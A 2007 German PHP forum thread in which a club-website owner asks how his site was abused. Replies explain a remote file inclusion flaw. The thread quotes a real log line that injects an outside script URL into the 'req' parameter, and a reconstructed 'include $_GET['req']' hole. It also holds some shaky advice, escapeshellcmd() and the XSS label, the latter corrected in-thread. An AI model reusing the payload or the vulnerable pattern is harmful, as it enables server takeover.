php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > IT-Security Forum > IT-Security
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


IT-Security Alles rund um IT-Security aus den Bereichen Hard- und Software

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 23-01-2007, 22:41
Clamsy1111
 Junior Member
Links : Onlinestatus : Clamsy1111 ist offline
Registriert seit: Jul 2004
Beiträge: 50
Clamsy1111 ist zur Zeit noch ein unbeschriebenes Blatt
Clamsy1111 eine Nachricht über ICQ schicken
Standard [Hilfe] Webscript ausgebäutet - Urheberrechtsstrafe

Hallo,

ich habe ein Webscript programmiert - Eigentlich eine ganz normale Vereinsseite eines Sport-Schützen-Vereines. Jetzt wurde der Server für mich gesperrt und habe eine Urheberrechtsstrafe zu zahlen.

Folgendes ist passiert.

Ich übergebe den Seiteninhalt Aufruf mit POST und GET also schaut meine URL wie folgt aus:

www.serveradresse.de/index.php?req=main

das Script weis dann das es die inhalte aus der SQL Datenbank unter dem Eintrag main hervorholen soll.

Jetzt wurde mein Script angeblich dazu verwendet um Dateien auf dem Server abzulegen. Angeblich Videos und so und der Hacker oder wie auch immer hat meine Index Datei benutzt um diese angeblich von meinem Server abzurufen.

Der link laut LOG dateien sieht wie folgt aus... (IP Adresse mit absicht gepostet, da es von irgendjemanden ist, der am 13.01.2007 dieses URL ausgeführt hat.)

87.6.106.140 - - [13/Jan/2007:15:49:56 +0100] "GET /index.php?req=http://beforethehighway.com/phpmyadmin/osx-sux.jpg? HTTP/1.1" 200 56519 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"

Ich verstehe nur nicht wie 1. derjenige über diese Zeile angebliche Files auf meinen Server legen hätte können, und 2. wie er sie mit diesem Befehl für andere zur Verfügung stellen kann.

3. kann ich der Urheberrechtsstrafe auskommen, da hier ja ein Hacker unterwegs war?

4. ich finde nur Logs wo er abfragen gemacht hatte, aber nicht wo der Upload stattgefunden hat.

5. Ich habe auf einer Englischen Seite einen Eintrag gefunden unter:
http://www.castlecops.com/modules.ph...&id=44833&in=1

Hier ist auch was dazu erwähnt, aber ich komm damit nicht klar, weil hier von Ebay die rede ist. Laut meinem Serverbetreiber aber Videos und Online Casinos und Strip Poker anbieter sich abgelegt hätten.

6. Ist der Serverbetreiber nicht auch dafür verantwortlich das Seiten die er hostet geschützt werden durch unbefugtes Hacken?

7. Mit der seite http://beforethehighway.com kann man nicht wirklich was anfangen, ausser wenn man sich mal deren Quellcode ansieht, aber daraus werde ich auch nicht schlau, wie dieses Script aus Unterordnern meiner Seite welche ich für meine Zwecke eingerichtet hatte, genau eine bestimmte Datei ziehen kann. Noch dazu weil der Abfragelink immer der gleiche ist, aber ca von 500 verschiedenen Personen abgerufen wurde (IP-Adressen unterschiedlich) und das in nur wenigen Stunden.

Ich wäre euch echt dankbar, wenn mir hier einer eine Hilfe geben kann.
Wenn Ihr noch ein paar nähere Infos für meine Problematik habt, dann schreibt bzw. fragt mich, ich brauche eure hilfe, und somit gebe ich euch die nötigen Infos...

Schöne Grüße
Clamsy
Mit Zitat antworten
  #2 (permalink)  
Alt 23-01-2007, 22:50
wahsaga
  Moderator
Links : Onlinestatus : wahsaga ist offline
Registriert seit: Sep 2001
Beiträge: 25.236
wahsaga befindet sich auf einem aufstrebenden Ast
Standard Re: [Hilfe] Webscript ausgebäutet - Urheberrechtsstrafe

Zitat:
Original geschrieben von Clamsy1111
Ich verstehe nur nicht wie 1. derjenige über diese Zeile angebliche Files auf meinen Server legen hätte können
Wenn ich die enthaltene Adresse abrufe, meldet sich sofort mein AntiVir, und meldet einen "PHP-Virus" - also wohl irgendein Script, welches entsprechende Upload-Funktionalität bereitstellt.

Und da du wohl dummerweise dein eigenes Script so geschrieben hast, dass sich darüber beliebige externe Ressourcen einbinden lassen, konnte der so sein Script auf deinem Server ausführen ...
Zitat:
Ist der Serverbetreiber nicht auch dafür verantwortlich das Seiten die er hostet geschützt werden durch unbefugtes Hacken?
*lol*

Man könnte ihm höchstens vorwerfen, allow_url_fopen aktiviert zu haben - da das aber viele Kunden verlangen, ist das eigentlich nichts besonderes.

Schuld an dem ganzen war dein miserabel und dilletantisch geschriebenes Script.


Mein guter Rat: Gehe mit der Sache zu einem Anwalt, und lasse dich kundig beraten, wie du der "Strafforderung" (vermutlich meinst du eine Abmahnung?) vielleicht noch entgehen kannst, weil du dein Script nur aus Naivität und nicht mutwillig so dümmlich geschrieben hast, dass es ganz leicht hackbar war.
__________________
I don't believe in rebirth. Actually, I never did in my whole lives.
Mit Zitat antworten
  #3 (permalink)  
Alt 23-01-2007, 23:32
combie
 PHP Expert
Links : Onlinestatus : combie ist offline
Registriert seit: May 2006
Beiträge: 3.296
combie wird schon bald berühmt werden
Standard

Die kaputte, gefährliche Stelle sieht in etwa so aus:
PHP-Code:
include $_GET['req']; 
Da können natürlich noch weitere Böcke drinstecken....
Mit Zitat antworten
  #4 (permalink)  
Alt 23-01-2007, 23:49
asp2php
 Banned
Links : Onlinestatus : asp2php ist offline
Registriert seit: Feb 2004
Beiträge: 11.745
asp2php ist zur Zeit noch ein unbeschriebenes Blatt
Standard

vielleicht sollten wir diesen Thread als Sticky festnageln, damit die Scriptkiddies endlich die "Proggerei" ernst nehmen und uns nicht immer vorwerfen, dass wir zu grob zu denjenigen waren, die kaum Grundlagen beherrschen
Mit Zitat antworten
  #5 (permalink)  
Alt 24-01-2007, 08:59
Wyveres
 Registrierter Benutzer
Links : Onlinestatus : Wyveres ist offline
Registriert seit: Dec 2006
Ort: Rügen
Beiträge: 763
Blog-Einträge: 2
Wyveres ist zur Zeit noch ein unbeschriebenes Blatt
Wyveres eine Nachricht über ICQ schicken
Standard

jetzt weis ich das ich dinge die ich per GET übergebe nie wieder ungeprüft ins skript lasse ...

merke wenn du steuerst mit GET dann prüfe auch ob das was oben im get ankommt auch das ist was du erwartest.

(irgenntwo hatte ich doch diese ironie gelassen fragt mich blos nicht wo

ansonsten schliesse auch ich mich meinen vorrednern an und sage. geh schleunigst zum anwalt.

MfG Wyveres
__________________
Bitte Beachten.
Foren-Regeln
Danke
Mit Zitat antworten
  #6 (permalink)  
Alt 07-02-2007, 15:06
Lord Q
 Newbie
Links : Onlinestatus : Lord Q ist offline
Registriert seit: Feb 2007
Beiträge: 1
Lord Q ist zur Zeit noch ein unbeschriebenes Blatt
Lord Q eine Nachricht über ICQ schicken
Standard

1. Never trust the user

2. All incoming data is EVIL

Du kommst nicht drum rum alles zu filtern was irgendwo vom Nutzer eingegeben werden kann und das schließt selbstverständlich auch die URL ein.

Die Funktion escapeshellcmd() ist schon mal ein guter Anfang, zum Maskieren von Steuerzeichen in Eingaben, ansonsten RegEx´s zum Filtern oder du speicherst alle erlaubten "req"-Parameter in ner Liste.

Und falls es dich interessiert, die Angriffstechnik bezeichnet man auch als XSS = Cross-Site-Scripting, in diesem Fall serverseitig durch einbeiden eines externen Scripts.
Mit Zitat antworten
  #7 (permalink)  
Alt 07-02-2007, 15:38
wahsaga
  Moderator
Links : Onlinestatus : wahsaga ist offline
Registriert seit: Sep 2001
Beiträge: 25.236
wahsaga befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Original geschrieben von Lord Q
Und falls es dich interessiert, die Angriffstechnik bezeichnet man auch als XSS = Cross-Site-Scripting, in diesem Fall serverseitig durch einbeiden eines externen Scripts.
Wobei letzteres wohl eher Code Injection wäre.
__________________
I don't believe in rebirth. Actually, I never did in my whole lives.
Mit Zitat antworten
  #8 (permalink)  
Alt 07-02-2007, 16:23
jahlives
 Master
Links : Onlinestatus : jahlives ist offline
Registriert seit: Jun 2004
Ort: Hooker in Kernel
Beiträge: 8.279
jahlives ist zur Zeit noch ein unbeschriebenes Blatt
Standard

@topicstarter
Im Quellcode der von dir angegebenen Seite findest du zwei IP's. Eine aus gehört einem Anbieter aus Dallas und eine einem Anbieter aus Estland. Von diesen beiden Servern lädt der Schadcode weitere Daten runter.
Ggf mal die Betreiber anschreiben. Wenn das nicht hilft, dann eine Anzeige bei der Polizei unter Angabe aller Daten. Dann sollten die Betreiber solche Daten eher rausrücken.
Ob's hilft ist was anderes...

Gruss

tobi
__________________
Gutes Tutorial | PHP Manual | MySql Manual | PHP FAQ | Apache | Suchfunktion für eigene Seiten

"An error does not become truth by reason of multiplied propagation, nor does truth become error because nobody sees it."
Mohandas Karamchand Gandhi (Mahatma Gandhi) (Source)
Mit Zitat antworten
  #9 (permalink)  
Alt 07-02-2007, 21:46
hall
 Registrierter Benutzer
Links : Onlinestatus : hall ist offline
Registriert seit: Jun 2004
Ort: Berlin
Beiträge: 818
hall befindet sich auf einem aufstrebenden Ast
Standard

ein wenig lektüre zum thema

http://www.heise.de/security/artikel/84149/0
__________________
mfg
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

Die RIGID-FLEX-Technologie
Die RIGID-FLEX-TechnologieDie sogenannte "Flexible Elektronik" , oftmals auch als "Flexible Schaltungen" bezeichnet, ist eine zeitgemäße Technologie zum Montieren von elektronischen Schaltungen.

06.12.2018 | Berni

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni


 

Aktuelle PHP Scripte

ContentLion - Open Source CMS ansehen ContentLion - Open Source CMS

ContentLion ist ein in PHP geschriebenes CMS, bei dem man Seiten, Einstellungen usw. in Ordnern lagern kann

22.08.2019 stevieswebsite2 | Kategorie: PHP/ CMS
Adsman Pro - Werbe-Manager V.1.1.0

Mit ADSMAN PRO haben Sie die Marketinglösung für eine effektive und effiziente Werbeschaltung mit messbaren Ergebnissen. Unterstützt werden Bannerformate in beliebigem Format, Textanzeigen und Page-Peels mit umfangreichen Text und Flash-Effekte.

30.07.2019 rhs | Kategorie: PHP/ Bannerverwaltung
HeidiSQL - kostenloses MySQL front-end Editor für Windows ansehen HeidiSQL - kostenloses MySQL front-end Editor für Windows

HeidiSQL - ist ein Windows-Editor für die bekannt open Source Datenbank mySQL

30.07.2019 Berni | Kategorie: MYSQL/ Management
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 20:34 Uhr.